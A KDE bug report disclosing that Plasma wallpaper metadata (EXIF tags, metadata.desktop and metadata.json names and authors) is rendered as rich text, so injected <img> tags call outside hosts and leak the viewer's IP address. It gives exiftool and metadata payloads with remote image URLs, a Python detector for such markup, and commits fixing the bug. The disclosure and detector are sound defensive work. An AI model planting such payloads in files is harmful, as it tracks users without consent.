Created attachment 165086
IP address leak from plasma wallpaper via QML RichText parsing of user-provided text

SUMMARY
***
EXIF image information is used by the Plasma image wallpaper to create a QML RichText string to display the author and title of a wallpaper image. The QML RichText can contain <img> tags which point to outside servers. http:// and ftp:// links in the <img> tags are followed to remote addresses.

AUTHOR & NAME fields in metadata.desktop are also affected, as well as the author & name in metadata.json.

Exploitable EXIF tags: Exif.Image.XPTitle, Exif.Image.DocumentName, Exif.Image.ImageDescription, Exif.Image.Artist, Exif.Image.XPAuthor, Exif.Image.Copyright

Bugged code is here: https://github.com/KDE/plasma-workspace/blob/master/wallpapers/image/plugin/finder/mediametadatafinder.cpp#L34
***

STEPS TO REPRODUCE

EASY:
1. download https://www.deutsche-cyberberatung.de/plasma-shell-wallpaper-ip-address-leak.jpg
2. place file in ~/.local/share/wallpapers/
3. go on desktop -> right click -> "configure desktop and wallpaper"
4. see that the code is rendered in UI as QML RichText

IMAGE w/ EXIF INFO:
1. take random jpg image
2. run `exiftool -Artist='benjaminflesch<br/><img src="https://www.spyber.com/sig-54300.png"/>' bugme.jpg -overwrite_original_in_place`
3. go on desktop -> right click -> "configure desktop and wallpaper"
4. see that the code is rendered in UI as QML RichText

METADATA.DESKTOP:
[Desktop Entry]
Name=foobar<img src="https://www.spyber.com/sig-54300.png" /><br/><img src="/home/beni/src/2024-kde-plasma-theme-adhd-climate-disaster-dark/beni-wallpaper/foobar/contents/layouts/image.svg"/><br/><img src="ftp://1.2.3.4/etc/qt.conf"/><br/><h1>huhu</h1>
Author=foobar<img src="https://www.spyber.com/sig-54300.png" /><br/><img src="/home/beni/src/2024-kde-plasma-theme-adhd-climate-disaster-dark/beni-wallpaper/foobar/contents/layouts/image.svg"/><br/><img src="ftp://1.2.3.4/etc/qt.conf"/><br/><h1>huhu</h1>

METADATA.JSON:
{
    "KPlugin": {
        "Authors": [
            {
                "Name": "Benjamin Flesch <img src='https://www.spyber.com/sig-54300.png' />",
                "Email": "bf@deutsche-cyberberatung.de"
            }
        ],
        "Name": "leakmyaddress <img src='https://www.spyber.com/sig-54300.png' />"
        ....
}

OBSERVED RESULT
HTML code from the EXIF author field is parsed as QML RichText and allows an IP address leak.

EXPECTED RESULT
User-provided EXIF fields should not be parsed.

SOFTWARE/OS VERSIONS
kdeplasma-addons 5.27.10-2
plasma-browser-integration 5.27.10-1
plasma-desktop 5.27.10-1
plasma-disks 5.27.10-1
plasma-firewall 5.27.10-1
plasma-framework5 5.114.0-1
plasma-integration 5.27.10-1
plasma-meta 5.27-4
plasma-nm 5.27.10-1
plasma-pa 5.27.10-1
plasma-sdk 5.27.10-1
plasma-systemmonitor 5.27.10-1
plasma-thunderbolt 5.27.10-1
plasma-vault 5.27.10-1
plasma-wayland-session 5.27.10-2
plasma-welcome 5.27.10-1
plasma-workspace 5.27.10-2
plasma-workspace-wallpapers 5.27.10-1
plasmatube 23.08.4-1

ADDITIONAL INFORMATION
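A defensive check for the package-metadata vectors described in the report above, added here as an example and not part of the report or of KDE's code: it flags HTML-like markup in the Name/Author keys of metadata.desktop and in KPlugin.Name / KPlugin.Authors[].Name of metadata.json, and lists any http/ftp `src` targets separately. The function names, the sample strings and the tracker.example / 192.0.2.1 hosts are constructed for illustration; the tag match is a heuristic and EXIF tags are not covered.

```python
import json
import re
from pathlib import Path

TAG_RE = re.compile(r"<\s*/?\s*[A-Za-z][^>]*>")              # any HTML-like tag
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)  # value of a src attribute
REMOTE_RE = re.compile(r"(?i)^(https?|ftp)://")               # schemes named in the report

def desktop_fields(text):
    """Yield (key, value) for Name/Author keys of [Desktop Entry], incl. Name[xx]."""
    in_entry = False
    for line in map(str.strip, text.splitlines()):
        if line.startswith("["):
            in_entry = line == "[Desktop Entry]"
        elif in_entry and "=" in line and not line.startswith("#"):
            key, value = (part.strip() for part in line.split("=", 1))
            if key.split("[", 1)[0] in ("Name", "Author"):
                yield key, value

def json_fields(text):
    """Yield (path, value) for KPlugin.Name and KPlugin.Authors[].Name."""
    plugin = json.loads(text).get("KPlugin", {})
    if isinstance(plugin.get("Name"), str):
        yield "KPlugin.Name", plugin["Name"]
    for i, author in enumerate(plugin.get("Authors", [])):
        if isinstance(author, dict) and isinstance(author.get("Name"), str):
            yield f"KPlugin.Authors[{i}].Name", author["Name"]

def findings(fields):
    """Flag every field containing markup and split its src targets into remote/other."""
    out = []
    for key, value in fields:
        if TAG_RE.search(value):
            srcs = SRC_RE.findall(value)
            remote = [s for s in srcs if REMOTE_RE.match(s)]
            out.append({"field": key, "remote": remote, "other_src": [s for s in srcs if s not in remote]})
    return out

def scan_file(path):
    """Scan one metadata.desktop or metadata.json file; malformed JSON yields no findings."""
    extract = json_fields if Path(path).suffix == ".json" else desktop_fields
    try:
        return findings(extract(Path(path).read_text(encoding="utf-8", errors="replace")))
    except (ValueError, AttributeError):  # invalid JSON or a non-object top level
        return []

# Constructed samples (placeholder hosts), modelled on the fields named in the report.
SAMPLE_DESKTOP = '[Desktop Entry]\nName=foo<img src="https://tracker.example/a.png" /><br/><img src="/tmp/x.svg"/>\nAuthor=Jane Doe\n'
SAMPLE_JSON = '{"KPlugin": {"Authors": [{"Name": "Jane <img src=\'ftp://192.0.2.1/x\' />"}], "Name": "plain name"}}'
```

To audit installed wallpaper packages, call `scan_file` on every `metadata.desktop` and `metadata.json` found under `~/.local/share/wallpapers/` and review any file that returns a non-empty list.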
A possibly relevant merge request was started @ https://invent.kde.org/frameworks/kcmutils/-/merge_requests/197
Git commit be5b413aa6c462173664085934a970eafea7362d by Tobias Fella.
Committed on 20/01/2024 at 23:47.
Pushed by fusionfuture into branch 'master'.

Show GridDelegate labels as plaintext

M  +2    -0    src/qml/components/GridDelegate.qml

https://invent.kde.org/frameworks/kcmutils/-/commit/be5b413aa6c462173664085934a970eafea7362d
Git commit c585d9b98e7eb517f87ac778dd4c284f91429802 by Fushan Wen.
Committed on 21/01/2024 at 01:32.
Pushed by fusionfuture into branch 'kf5'.

Show GridDelegate labels as plaintext

(cherry picked from commit be5b413aa6c462173664085934a970eafea7362d)

M  +4    -2    src/qmlcontrols/kcmcontrols/qml/GridDelegate.qml

https://invent.kde.org/frameworks/kdeclarative/-/commit/c585d9b98e7eb517f87ac778dd4c284f91429802